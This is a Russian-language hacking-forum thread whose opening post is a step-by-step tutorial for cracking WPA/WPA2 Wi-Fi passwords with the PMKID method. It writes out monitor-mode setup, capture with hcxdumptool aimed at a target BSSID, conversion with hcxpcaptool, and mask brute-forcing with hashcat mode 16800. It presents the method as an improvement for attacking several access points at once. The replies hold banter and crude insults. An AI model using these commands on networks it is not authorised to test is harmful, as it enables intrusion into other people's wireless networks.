Загрузка...

A new way to hack Wi-Fi

Thread in WiFi created by renameduser_168132 Aug 15, 2018. 3141 view

  1. renameduser_168132
    renameduser_168132 Topic starter Aug 15, 2018 Banned 294 Aug 29, 2017
    Если запишите видео, добавлю в тему с указанием автора + лично от меня симпы ( не одна, ни 2, ни 3 ))) Больше)
    Суть метода заключается в том что Вы можете получить идентификатор PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)).
    Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. Основная разница этой атаки от существующих, в том что нет необходимости захватывать полное "рукопожатие", а достаточно одного кадра EOPOL, ну второе не менне важное - это то что нет необходимости ждать пользователя который подключиться к атакуемой сети, так как атака будет происходить непосредственно на саму AP.

    И так для проведения атаки нам будет необходимо:
    1. Linux (в моем случае Linux parrot 4.16.0-parrot16-amd64)
    2. hcxtools
    3. hcxdumptool
    4. Hashcat v4.2.0
    Для начала пройдемся по загрузке и установке:
    Hcxtools (аналогично и для hcxdumptool)

    1. git clone ZerBea/hcxtools
    2. cd hcxtools
    3. make
    4. make install
    Hashcat v4.2.0
    Даже если у Вас уже установлен hashcat, но он ниже версии 4.2.0, то Вам нужно будет его удалить, затем скачать свежую версию и установить, как и я это делал, ну или обновить другим известным для Вас способом т.к. в старых версиях нет метода расшифровки PMKID для WPA/WPA2 (а именно 16800).
    1. git clone hashcat/hashcat
    2. cd hashcat
    3. make
    4. make install * (пояснения внизу)
    Всю атаку я буду проводить на своем роутере. Марка Asus RT-N12C1. Прошивка последняя.
    I.Переводим наш беспроводной интерфейс в режим монитора:
    1 способ
    Код:
    airmon-ng start wlan0 (wlan0 - это Ваш интерфейс, посмотреть можно введя команду ifconfig)
    airmon-ng check kill
    2 способ
    Код:
    ifconfig wlan0 down
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up
    airmon-ng check kill
    II. Запускаем сканирование Wi-Fi сетей
    airodump wlan0mon (wlan0 в зависимости от того каким способом пользовались)
    мой тестовый Wi-Fi называется "Happy_New_Year"

    [IMG]

    Сохраняем BSSID нашей тестовой AP БЕЗ ДВОЕТОЧИЙ в файл... я это сделал следующей командой:
    Код:
    echo "60A44C55D7C0" > filter.txt
    III. Запускаем Hcxdumptool
    hcxdumptool -i wlan0 -o hash --filterlist=filter.txt --filtermode=2 --enable_status=1 , где
    -i wlan0 -имя нашего сетевого интерфейса
    -o hash - выходной файл в pcapng формате в котором есть строка PMKID с хешем
    --filtermode=2 - указываем что наш filter.txt будет целевым списком
    --filterlist=filter.txt - файл с BSSID который мы Вы сохранили
    --enable_status=1 - включаем сообщения по маске ( EAPOL,PROBEREQUEST,AUTHENTICATON или ASSOCIATION )

    [IMG]

    после получения сообщения "FOUND PMKID" мы останавливаем работу скрипта, и как вы можете заметить мне пришло аж сразу 3 сообщения о найденных пакетах в которм содержится строка с хешем PMKID. И так, Hcxdumptool справился со своей задачей и нашел нужный пакет с хешем... идем дальше!
    IV Запускаем hcxpcaptool
    hcxpcaptool -z hash_crack hash ,где
    -z hash_crack - выходной файл, с хешем PMKID очищенной от лишней инфы, для hashcat (hashmod -m 16800). преобразован в обычный текст.
    hash - файл в pcapng формате (все собранные пакеты hcxdumptool)

    [IMG]

    В моем случае он обнаружил 3 пакета, как я уже говорил, и все данные записал в мой текстовый файл hash_crack..... в 3 строки. Как раз эти строки мы и будем расшифровывать в HASHCAT

    [IMG]

    V. Запускаем HASHCAT
    hashcat -m 16800 -a 3 -w 3 hash_crack '?u?s?d23456A' --force ,где хочу только пояснить
    -m 16800 - новый hashmod который появился в версии 4.2.0
    ?u?s?d?d?d?d?d6A - мой пароль по маске + 2 последних символа которых я знаю из этого пароля

    [IMG]

    1 день и 4 часа проверять я конечно же не буду!), но я добавил ее пару известных символов и перезапустил... вот результат...

    [IMG]

    пароль был успешно найден)))))
    Вывод из всего этого могу сделать только один.... данный метод на голову выше своих предыдущих вариантов атаки, к тому же я посмотрел на скорость которая хоть и не намного выше чем в aircrack-ng, но все же, а если учесть то что у некоторых есть хорошие видеокарты, то это вообще отличное подспорье! к тому же нет больше необходимости ждать юзверя и перехватывать "рукопожатие" + этих скриптов в том что можно это все делать не на одной точке а на нескольких одновременно... добавив в первичный текстовый файл BSSID разных AP.
    З.Ы. Трудности с которыми я столкнулся:
    1. наверно единственная была маленькая проблема при переустановке hashcat. После удаления (apt-get remove hashcat), перешел в папку свежескачанного скрипта.....
    1. make
    2. make install
    и тут мне выдает ошибку - "include/ext_OpenCL.h:15:10: fatal error: CL/cl.h: No such file or directory #include <CL/cl.h>" , мол нет какой-то папки....так и правильно у меня в принципе не было OpenGL....так что порыскав, в течении пару минут нашел решение - apt-get install opencl-headers, после чего hashcat благополучно заработал!
    Источник:codeby[/LIKES]
     
  2. renameduser_168132
    renameduser_168132 Topic starter Aug 15, 2018 Banned 294 Aug 29, 2017
    Че пацаны, робит?
     
  3. Donime
    Donime Aug 15, 2018 Banned 67 May 1, 2017
    Авторку чуваку
     
  4. renameduser_168132
    renameduser_168132 Topic starter Aug 15, 2018 Banned 294 Aug 29, 2017
    Если запишите видео, добавлю в тему с указанием автора + лично от меня симпы ( не одна, ни 2, ни 3 ))) Больше)
     
  5. Mevil_inactive305472
    Mevil_inactive305472 Aug 15, 2018 Banned 36 Feb 18, 2018
    Одной)))
     
  6. binarycode
    binarycode Aug 15, 2018 Изменить статус 347 Dec 5, 2017
  7. binarycode
    binarycode Aug 15, 2018 Изменить статус 347 Dec 5, 2017
    Опа, спасибо добрые люди.
     
  8. ATEIST_inactive333136
    ATEIST_inactive333136 Aug 15, 2018 Banned 142 Mar 11, 2018
  9. binarycode
    binarycode Aug 15, 2018 Изменить статус 347 Dec 5, 2017
    Тема четкая и серьезная, жалко я ничего не понял.
     
  10. binarycode
    binarycode Aug 15, 2018 Изменить статус 347 Dec 5, 2017
    nnMillionaire, когда рассказал шутку но никто не услышал, потом друг пересказал и все засмеялись.
     
  11. MSLZT60588
    MSLZT60588 Aug 15, 2018 Banned 874 Nov 21, 2016
    Баян
     
  12. binarycode
    binarycode Aug 15, 2018 Изменить статус 347 Dec 5, 2017
    А ведь все так хорошо шло:warpath:
     
  13. d1van4ik_inactive94337
    d1van4ik_inactive94337 Aug 15, 2018 Banned 140 Mar 16, 2017
    Пойду ставить линукс на флешку и тестить
     
  14. renameduser_168132
    renameduser_168132 Topic starter Aug 15, 2018 Banned 294 Aug 29, 2017
    ахах, на публику раздалбай играет, мне тебя жаль и не оправдывайся)):warpath:
     
  15. binarycode
    binarycode Aug 15, 2018 Изменить статус 347 Dec 5, 2017
    nnMillionaire, у чувака фортануло с темой больше. Больно наверное
     
  16. nnMillionaire
    nnMillionaire Aug 15, 2018 1309 Jun 14, 2017
    Да мне то что ? Флаг ему в сраку , и попутного ветра , как говориться
     
  17. renameduser_168132
    renameduser_168132 Topic starter Aug 15, 2018 Banned 294 Aug 29, 2017
    ахах, посмотрите на ущерба, это и не его тема тоже, а возмущается петушок по самый негорюй
     
  18. EllikTOP
    EllikTOP Aug 15, 2018 40 Jul 13, 2018
  19. Repeter
    Repeter Aug 15, 2018 Why? 205 Jul 27, 2018
    Ага,спиздил значит :hovan:
     
  20. renameduser_168132
    renameduser_168132 Topic starter Aug 15, 2018 Banned 294 Aug 29, 2017
Loading...
Top